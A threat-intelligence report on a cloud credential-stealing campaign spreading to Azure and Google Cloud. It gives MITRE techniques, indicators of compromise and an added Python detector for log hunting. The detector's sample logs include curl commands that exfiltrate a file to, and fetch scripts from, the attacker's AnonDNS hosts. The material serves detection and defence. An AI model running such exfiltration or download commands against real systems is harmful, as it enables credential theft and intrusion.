An actor behind a cloud credentials-stealing campaign expands from AWS to Azure and Google Cloud Platform, introducing modular tooling, Docker-targeting propagation, and data exfiltration to AnonDNS. Research notes similarities to TeamTNT and highlights ongoing tooling evolution toward broader cloud targets and stealthier operations. Hashtags: #Cloud_Credentials_Stealer #Azure #GoogleCloudPlatform #AnonDNS #TeamTNT #Permiso #Docker #AWS
Keypoints
- In June 2023, the actor expanded credential theft to Azure and GCP beyond AWS.
- Exposed Docker services are targeted, with a worm-like propagation module added.
- Tooling became more modular; AWS functionality is driven by run_aws_grabber, with new Azure and GCP logic (get_azure and get_google).
- The campaign infrastructure moved from a Netherlands-based IP to AnonDNS (DDNS), using hardcoded credentials for C2.
- System profiling and discovery were added (get_docker, get_prov_vars, Data.sh) to enumerate hosts, containers, and processes.
- Credential collection now targets numerous files across CSPs (Azure, GCP, Kubernetes secrets, Redis, etc.), with updated credential file arrays.
- Exfiltration uses curl to send data to AnonDNS endpoints; multiple exfil URLs and SHA1s indicate evolving variants.
MITRE Techniques
- [T1059.003] Unix Shell – The campaigns rely on Bash scripts (aws.sh, Data.sh) and show modular function design;
  Quote: “The script uses the cred_files function to search for credentials files on the system, write them to a temporary file …”
- [T1027.001] Obfuscated/Compressed Data – An embedded base64 blob is decoded to reveal a Bash script;
  Quote: “The main_main function decodes an embedded base64 blob, resulting in a Bash script that is written and then executed by the main_runCommand function.”
- [T1046] Network Service Scanning – The actor uses masscan and zgrab to identify vulnerable targets;
  Quote: “Masscan scans the specified IP ranges then passes the results to zgrab, which looks for misconfigured Docker daemons running version 1.16.”
- [T1105] Ingress Tool Transfer – The attacker downloads tooling from their server to install dependencies;
  Quote: “downloads the dependencies from the attacker’s server, hosted at the URI: /bin/[bin_name].”
- [T1071.001] Web Protocols – C2 communications and exfiltration use HTTP/S endpoints;
  Quote: “Exfil URL http[:]//everlost.anondns.net/upload.php”
- [T1041] Exfiltration Over C2 Channel – Exfiltration of collected credential data to an AnonDNS server;
  Quote: “The credentials stealing scripts use curl to exfiltrate the contents of the $CSOF file to an AnonDNS-hosted server.”
- [T1552.001] Credentials in Files – The campaign targets credential files across CSPs (Azure, GCP, AWS), including azure.json and various cloud-related artifacts;
  Quote: “The credentials collection logic in the new campaign’s samples targets the following services & technologies:”
- [T1057] Process Discovery – System profiling includes examining running processes;
  Quote: “ps aux Details about all running processes”
- [T1033] System Owner/User Discovery – Identity discovery via whoami and user listings;
  Quote: “Current user” and “List of users with active terminal sessions”
Indicators of Compromise
- [SHA1] Cloud credential stealer hashes – 0e1805fd9efa6a1c3fe9adb3f34373a9dcc7fe19, 18d28ac44c5501f1768f0fc155ad38aa56610881, and other hashes
- [Domain] Exfil/C2 domains – ap-northeast-1.compute.internal.anondns.net, everfound.anondns.net, everlost.anondns.net, silentbob.anondns.net
- [IPv4] Command & control / exfil endpoints – 207.154.218.221, 45.9.148.108
- [URL] Exfil and command URLs – http://silentbob.anondns.net/bin/chattr, http://silentbob.anondns.net/bin/a, http://silentbob.anondns.net/cmd/grab.sh, http://silentbob.anondns.net/cmd/clean.sh, http://silentbob.anondns.net/cmd/aws.sh
- [FileName] Credential-related scripts – run.sh, aws.sh, g.aws.sh, data.sh
- [Monero] Wallet address – 43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U
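The exfiltration keypoint and the indicators above translate directly into a hunt over host or proxy logs. The following is an added detection example, not code from the report or from Permiso: it refangs each line, matches the report's domains, IPs and URL paths, and additionally flags any other anondns.net host, since the actor rotates DDNS names. The log lines are constructed for the example, and the loose key=value format is an assumption.

```python
import re
from typing import Optional

# Indicators quoted in this report; the anondns.net suffix rule covers
# new DDNS hostnames the actor may register beyond these.
IOC_DOMAINS = {"everlost.anondns.net", "everfound.anondns.net",
               "silentbob.anondns.net",
               "ap-northeast-1.compute.internal.anondns.net"}
IOC_IPS = {"207.154.218.221", "45.9.148.108"}
IOC_PATHS = ("/upload.php", "/bin/", "/cmd/")   # exfil and tool-fetch paths
SUSPICIOUS_SUFFIX = ".anondns.net"

URL_RE = re.compile(r"https?://([\w.\-]+)(/[^\s\"']*)?", re.IGNORECASE)


def refang(text: str) -> str:
    """Undo common defanging (hxxp, [.], [:]) so logs and IoCs compare equal."""
    return text.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def classify_line(line: str) -> Optional[dict]:
    """Return an alert dict for a matching log line, or None if it is clean."""
    text = refang(line)
    for ip in IOC_IPS:  # exact IP match, not a substring of a longer address
        if re.search(rf"(?<![\d.]){re.escape(ip)}(?![\d.])", text):
            return {"kind": "ip", "value": ip, "line": line}
    for m in URL_RE.finditer(text):
        host, path = m.group(1).lower(), (m.group(2) or "")
        if host in IOC_DOMAINS or host.endswith(SUSPICIOUS_SUFFIX):
            kind = "known_domain" if host in IOC_DOMAINS else "anondns_suffix"
            if path.startswith(IOC_PATHS):  # upload.php, /bin/, /cmd/ paths
                kind = "exfil_or_tool_fetch"
            return {"kind": kind, "value": host + path, "line": line}
    return None


# Constructed sample lines (not taken from the report).
SAMPLE_LOG = """
2023-06-12T10:01:22Z host=web1 cmd="curl -F file=@/tmp/.x http://everlost.anondns.net/upload.php"
2023-06-12T10:01:25Z host=web1 cmd="curl -s http://silentbob.anondns.net/cmd/aws.sh -o aws.sh"
2023-06-12T10:02:00Z host=web2 dst=45.9.148.108 dport=80 proto=tcp
2023-06-12T10:02:10Z host=web2 cmd="curl http://newname.anondns.net/x"
2023-06-12T10:03:00Z host=web3 cmd="curl https://example.com/health"
""".strip().splitlines()


def scan(lines) -> list:
    """Run classify_line over every line and keep only the alerts."""
    return [a for a in map(classify_line, lines) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["kind"], alert["value"])
```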